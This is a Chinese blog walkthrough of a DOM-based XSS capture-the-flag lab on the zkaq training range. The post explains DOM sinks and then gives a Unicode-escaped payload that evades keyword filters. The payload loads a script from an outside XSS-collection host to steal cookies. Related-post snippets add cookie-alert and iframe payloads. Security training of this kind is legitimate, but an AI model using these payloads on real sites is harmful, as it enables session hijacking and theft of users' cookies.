XSS注入(DOM型)---zkaq

已于 2022-04-21 23:37:07 修改
阅读量1k 收藏
点赞数
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-02 22:16:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/123930256
版权

1.知识点

DOM型XSS:DOM-Based XSS是一种基于文档对象模型DOM的Web前端漏洞,简单来说就是JavaScript代码缺陷造成的漏洞。与普通XSS不同的是,DOM XSS是在浏览器的解析中改变页面DOM树,且恶意代码并不在返回页面源码中回显

Dom型XSS常见函数:

  • document.write():写入网页内容(可以接受native编码)
  • innerHTML:修改节点内容
  • eval:将字符串当作代码执行

2.访问靶场

查看网页源代码,发现存在document.write()

页面跟url跟网页中都出现了dom_xss,猜想可能是url的传参

url传参成功,因此可以尝试下使用url触发xss


发现存在防火墙过滤,怀疑存在对<script和事件关键字的过滤,尝试进行js编码格式的payload:http://59.63.166.75:8014/dom_xss/?\u003c\u0073\u0043\u0052\u0069\u0050\u0074\u0020\u0073\u0052\u0043\u003d\u002f\u002f\u0068\u006b\u002e\u0073\u0062\u002f\u0069\u004e\u0030\u004d\u003e\u003c\u002f\u0073\u0043\u0072\u0049\u0070\u0054\u003e


结合xss平台payload进行js编码尝试攻击,发现url处不生效,发现还有个问题反馈模块,payload尝试下

成功拿到cookie、flag

real_plot
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
domxss靶场注入
weixin_45540609的博客
04-25 282
我们点开靶场的源码发现有关键函数document.write() 我们尝试在url里输入,发现这里可以控制传参 我们输入事件,发现被waf拦截了 换一种方式,使用<iframe onload=alert(/xss/),发现弹窗,说明存在xss漏洞,但是只是一个反射xss。 我们在xsspt上找到一个xss代码,输入代码,发现被waf拦截,这里可以使用navie编码再尝试。(因为document.write支持)在如下网址转化 <sCrIpt srC=//xs..
XSS注入(跨站脚本攻击)
wwwwyyyrre的博客
06-13 6197
今天学习一下xss注入
XSS注入(跨站脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1024
XSS注入是一种最普遍的网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
XSS注入
qq_43036356的博客
05-31 495
XSS跨站脚本(Cross-Site Scripting,XSS)自1996年诞生以来,如今已经历十多年的演化。由于和另一种网页技术-层叠样式表(Cascading Style Sheets,CSS)的缩写一样,为了防止混淆,故把原本的CSS简称为XSS
XSS注入的原理与实现
LJH1999ZN的博客
02-17 4361
一、JavaScript的常用脚本 1.window.location.href 用来跳转页面 eg:<script>window.location.href='www.jd.com'</script> 2.document.cookie 获取客户端的cookie值 3.script 可以通过“src”属性引入JavaScript文件 二、什么是同源策略 同源策略在web应用的安全模中是一个重要概念。在这个策略下,web浏览器允许第一个页面的脚本访问第...
常用解决跨站脚本(XSS) 和 代码注入思路
budongfengqing的博客
08-09 564
常用解决跨站脚本和代码注入思路
XXS攻击,HTML代码注入
枫叶
03-12 2728
XSS, 即为(Cross Site Scripting), 中文名为跨站脚本,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。 针对现在很多企业级开发的同学,...
存储XSS灰盒测试-01
09-15
存储XSS灰盒测试-01
XSS发生的位置-01
09-15
XSS发生的位置-01
3-4DomXSS详解以及演示
山兔的博客
04-21 3454
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
XSS注入——反射性XSS
wwwwyyyrre的博客
06-15 2290
所以就可以利用这个函数来构造payload,也是最简单的xss脚本语言:这样就可以绕过了 没有任何的限制 就是一个简单的反射xss注入等明天搭一个本地的靶场来做xss-labs我认为不是很难,反射xss
What is `DOM注入攻击` does?
张紫娃的博客
01-17 440
DOM(Document Object Model)注入攻击,也称为DOM跨站脚本(DOM-based XSS, 或简称DXSS),是一种特殊的跨站脚本攻击方式。不同于传统的存储XSS或反射XSSDOM注入攻击的关键在于客户端JavaScript动态修改了网页的DOM结构时引入了不受信任的数据。
安全-反射性xss基础注入
m0_63069714的博客
11-08 344
题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。
xss payload
07-15 379
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerab...
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7158
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类及测试流程反射XSS(post&get)存储XSSDomXSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射性XSS; 2.存储XSS;
DVWA-XSS(DOM)
08-25
而DVWA-XSS(DOM)攻击则是通过在DOM注入恶意脚本来篡改网页,从而控制用户浏览器的一种攻击行为。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值